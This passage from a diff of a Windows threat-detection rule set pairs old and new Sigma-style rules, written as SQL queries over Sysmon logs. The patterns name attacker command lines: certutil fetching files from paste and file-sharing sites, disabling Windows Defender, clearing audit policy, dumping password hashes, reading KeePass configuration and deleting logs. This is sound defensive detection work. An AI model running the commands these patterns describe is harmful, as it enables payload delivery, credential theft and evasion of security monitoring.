ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_cli_obfuscation_unicode.yml" + "filename": "proc_creation_win_susp_compression_params.yml" }, { - "title": "Script Interpreter Execution From Suspicious Folder", - "id": "1228c958-e64e-4e71-92ad-7d429f4138ba", + "title": "Potential MsiExec Masquerading", + "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", "status": "test", - "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", + "description": "Detects the execution of msiexec.exe from an uncommon directory", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass %' ESCAPE '\\' OR CommandLine LIKE '%/e:vbscript %' ESCAPE '\\' OR CommandLine LIKE '%/e:javascript %' ESCAPE '\\') OR OriginalFileName IN ('powershell.exe', 'pwsh.dll', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe')) AND (Image LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml" + "filename": "proc_creation_win_msiexec_masquerading.yml" }, { - "title": "HackTool - Koadic Execution", - "id": "5cddf373-ef00-4112-ad72-960ac29bac34", - "status": "test", - "description": "Detects command line parameters used by Koadic hack tool", - "author": "wagga, Jonhnathan Ribeiro, oscd.community", + "title": "Suspicious Regsvr32 Execution From Remote Share", + "id": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", + "status": "experimental", + "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007" + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%/q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%chcp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_koadic.yml" + "filename": "proc_creation_win_regsvr32_remote_share.yml" }, { - "title": "ImagingDevices Unusual Parent/Child Processes", - "id": "f11f2808-adb4-46c0-802a-8660db50fa99", - "status": "experimental", - "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Bypass UAC via WSReset.exe", + "id": "d797268e-28a9-49a7-b9a8-2f5039011c5c", + "status": "test", + "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", "tags": [ + "attack.privilege_escalation", "attack.defense_evasion", - "attack.execution" + "attack.t1548.002" ], "falsepositives": [ - "Unknown" + "Unknown sub processes of Wsreset.exe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND Image LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') OR ParentImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR OriginalFileName = 'CONHOST.EXE'))" ], - "filename": "proc_creation_win_imagingdevices_unusual_parents.yml" + "filename": "proc_creation_win_uac_bypass_wsreset.yml" }, { - "title": "HackTool - Quarks PwDump Execution", - "id": "0685b176-c816-4837-8e7b-1216f346636b", - "status": "experimental", - "description": "Detects usage of the Quarks PwDump tool via commandline arguments", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DumpStack.log Defender Evasion", + "id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", + "status": "test", + "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\QuarksPwDump.exe' ESCAPE '\\' OR CommandLine IN (' -dhl', ' --dump-hash-local', ' -dhdc', ' --dump-hash-domain-cached', ' --dump-bitlocker', ' -dhd ', ' --dump-hash-domain ', '--ntds-file')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DumpStack.log' ESCAPE '\\' OR CommandLine LIKE '% -o DumpStack.log%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_quarks_pwdump.yml" + "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml" }, { - "title": "HackTool - SharpLdapWhoami Execution", - "id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", - "status": "experimental", - "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", - "author": "Florian Roth (Nextron Systems)", + "title": "Audit Policy Tampering Via Auditpol", + "id": "0a13e132-651d-11eb-ae93-0242ac130002", + "status": "test", + "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Programs that use the same command line flags" + "Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpLdapWhoami.exe' ESCAPE '\\' OR OriginalFileName LIKE '%SharpLdapWhoami%' ESCAPE '\\' OR Product = 'SharpLdapWhoami' OR (CommandLine LIKE '% /method:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /method:kerb' ESCAPE '\\' OR CommandLine LIKE '% /method:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /m:kerb' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\auditpol.exe' ESCAPE '\\' OR OriginalFileName = 'AUDITPOL.EXE') AND (CommandLine LIKE '%disable%' ESCAPE '\\' OR CommandLine LIKE '%clear%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%restore%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpldapwhoami.yml" + "filename": "proc_creation_win_auditpol_susp_execution.yml" }, { - "title": "Potential Renamed Rundll32 Execution", - "id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", + "title": "PUA - Nimgrab Execution", + "id": "74a12f18-505c-4114-8d0b-8448dd5485c6", "status": "experimental", - "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", + "author": "frack113", "tags": [ - "attack.execution" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unlikely" + "Legitimate use of Nim on a developer systems" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%DllRegisterServer%' ESCAPE '\\' AND NOT (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nimgrab.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45%' ESCAPE '\\') OR md5 = '2DD44C3C29D667F5C0EF5F9D7C7FFB8B' OR sha256 = 'F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559' OR Imphash = 'C07FDDD21D123EA9B3A08EEF44AAAC45'))" ], - "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml" + "filename": "proc_creation_win_pua_nimgrab.yml" }, { - "title": "Operation Wocao Activity", - "id": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", + "title": "Suspicious File Download Using Office Application", + "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", "status": "test", - "description": "Detects activity mentioned in Operation Wocao report", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", - "attack.execution", - "attack.t1053.005", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%checkadmin.exe 127.0.0.1 -all%' ESCAPE '\\' OR CommandLine LIKE '%netsh advfirewall firewall add rule name=powershell dir=in%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c powershell.exe -ep bypass -file c:\\\\s.ps1%' ESCAPE '\\' OR CommandLine LIKE '%/tn win32times /f%' ESCAPE '\\' OR CommandLine LIKE '%create win32times binPath=%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\windows\\\\system32\\\\devmgr.dll%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass -enc JgAg%' ESCAPE '\\' OR CommandLine LIKE '%type %keepass\\\\KeePass.config.xml%' ESCAPE '\\' OR CommandLine LIKE '%iie.exe iie.txt%' ESCAPE '\\' OR CommandLine LIKE '%reg query HKEY\\_CURRENT\\_USER\\\\Software\\\\%\\\\PuTTY\\\\Sessions\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_wocao.yml" + "filename": "proc_creation_win_lolbin_office.yml" }, { - "title": "Microsoft IIS Service Account Password Dumped", - "id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", - "status": "experimental", - "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", - "author": "Tim Rauch, Janantha Marasinghe", + "title": "Potential Conti Ransomware Database Dumping Activity", + "id": "2f47f1fd-0901-466e-a770-3b7092834a1b", + "status": "test", + "description": "Detects a command used by conti to dump database", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND CommandLine LIKE '%list %' ESCAPE '\\') AND ((CommandLine LIKE '% /config%' ESCAPE '\\' OR CommandLine LIKE '% /xml%' ESCAPE '\\' OR CommandLine LIKE '% -config%' ESCAPE '\\' OR CommandLine LIKE '% -xml%' ESCAPE '\\') OR ((CommandLine LIKE '% /@t%' ESCAPE '\\' OR CommandLine LIKE '% /text%' ESCAPE '\\' OR CommandLine LIKE '% /show%' ESCAPE '\\' OR CommandLine LIKE '% -@t%' ESCAPE '\\' OR CommandLine LIKE '% -text%' ESCAPE '\\' OR CommandLine LIKE '% -show%' ESCAPE '\\') AND (CommandLine LIKE '%:\\*' ESCAPE '\\' OR CommandLine LIKE '%password%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' OR (CommandLine LIKE '%sqlcmd %' ESCAPE '\\' OR CommandLine LIKE '%sqlcmd.exe%' ESCAPE '\\')) AND CommandLine LIKE '% -S localhost %' ESCAPE '\\' AND (CommandLine LIKE '%sys.sysprocesses%' ESCAPE '\\' OR CommandLine LIKE '%master.dbo.sysdatabases%' ESCAPE '\\' OR CommandLine LIKE '%BACKUP DATABASE%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_iis_appcmd_service_account_password_dumped.yml" + "filename": "proc_creation_win_malware_conti_ransomware_database_dump.yml" }, { - "title": "Suspicious Encoded PowerShell Command Line", - "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", - "status": "test", - "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", + "title": "Disable Windows Defender AV Security Monitoring", + "id": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "status": "experimental", + "description": "Detects attackers attempting to disable Windows Defender using Powershell", + "author": "ok @securonix invrep-de, oscd.community, frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1562.001" + ], + "falsepositives": [ + "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '% JAB%' ESCAPE '\\') OR (CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '% JAB%' ESCAPE '\\' AND CommandLine LIKE '% -w%' ESCAPE '\\' AND CommandLine LIKE '% hidden %' ESCAPE '\\')) OR (CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '% BA^J%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAA%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% UwB%' ESCAPE '\\' OR CommandLine LIKE '% cwB%' ESCAPE '\\')) OR CommandLine LIKE '%.exe -ENCOD %' ESCAPE '\\') AND NOT (CommandLine LIKE '% -ExecutionPolicy%' ESCAPE '\\' AND CommandLine LIKE '%remotesigned %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%-DisableBehaviorMonitoring $true%' ESCAPE '\\' OR CommandLine LIKE '%-DisableRuntimeMonitoring $true%' ESCAPE '\\')) OR ((Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND ((CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\' AND CommandLine LIKE '%start=disabled%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_powershell_base64_encoded_cmd.yml" + "filename": "proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" }, { - "title": "Potential Dtrack RAT Activity", - "id": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", - "status": "stable", - "description": "Detects potential Dtrack RAT activity via specific process patterns", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Rundll32 JS RunHTMLApplication Pattern", + "id": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", + "status": "test", + "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ping -n %' ESCAPE '\\' AND CommandLine LIKE '% echo EEEE > %' ESCAPE '\\') OR (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\res.ip%' ESCAPE '\\') OR (CommandLine LIKE '%interface ip show config%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\netsh.res%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%javascript%' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\mshtml,RunHTMLApplication%' ESCAPE '\\') OR CommandLine LIKE '%;document.write();GetObject(\"script%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_dtrack.yml" + "filename": "proc_creation_win_rundll32_js_runhtmlapplication.yml" }, { - "title": "REvil Kaseya Incident Malware Patterns", - "id": "5de632bc-7fbd-4c8a-944a-fce55c59eae5", - "status": "test", - "description": "Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE", + "id": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", + "status": "experimental", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059", - "attack.g0115" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%C:\\\\Windows\\\\cert.exe%' ESCAPE '\\' OR CommandLine LIKE '%del /q /f c:\\\\kworking\\\\agent.crt%' ESCAPE '\\' OR CommandLine LIKE '%Kaseya VSA Agent Hot-fix%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\MsMpEng.exe%' ESCAPE '\\' OR CommandLine LIKE '%rmdir /s /q \\%SystemDrive\\%\\\\inetpub\\\\logs%' ESCAPE '\\' OR CommandLine LIKE '%del /s /q /f \\%SystemDrive\\%\\\\%.log%' ESCAPE '\\' OR CommandLine LIKE '%c:\\\\kworking1\\\\agent.exe%' ESCAPE '\\' OR CommandLine LIKE '%c:\\\\kworking1\\\\agent.crt%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\MsMpEng.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\cert.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\kworking\\\\agent.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\kworking1\\\\agent.exe' ESCAPE '\\') OR (CommandLine LIKE '%del /s /q /f%' ESCAPE '\\' AND CommandLine LIKE '%WebPages\\\\Errors\\\\webErrorLog.txt%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_revil_kaseya.yml" + "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml" }, { - "title": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", - "id": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", + "title": "Pingback Backdoor Activity", + "id": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", "status": "test", - "description": "Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall", - "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1562.004" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%allowedprogram%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%action=allow%' ESCAPE '\\' AND CommandLine LIKE '%program=%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%Public\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\updata.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%msdtc%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND CommandLine LIKE '%auto%' ESCAPE '\\')" ], - "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" + "filename": "proc_creation_win_malware_pingback_backdoor.yml" }, { - "title": "Potential Raspberry Robin Dot Ending File", - "id": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", - "status": "experimental", - "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Trickbot Malware Reconnaissance Activity", + "id": "410ad193-a728-4107-bc79-4419789fcbf8", + "status": "test", + "description": "Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.", + "author": "David Burkett, Florian Roth", "tags": [ - "attack.execution" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Unknown" + "Rare System Admin Activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine REGEXP '\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND Image LIKE '%\\\\nltest.exe' ESCAPE '\\' AND CommandLine LIKE '%/domain\\_trusts /all\\_trusts%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml" + "filename": "proc_creation_win_malware_trickbot_recon_activity.yml" }, { - "title": "Abusing IEExec To Download Payloads", - "id": 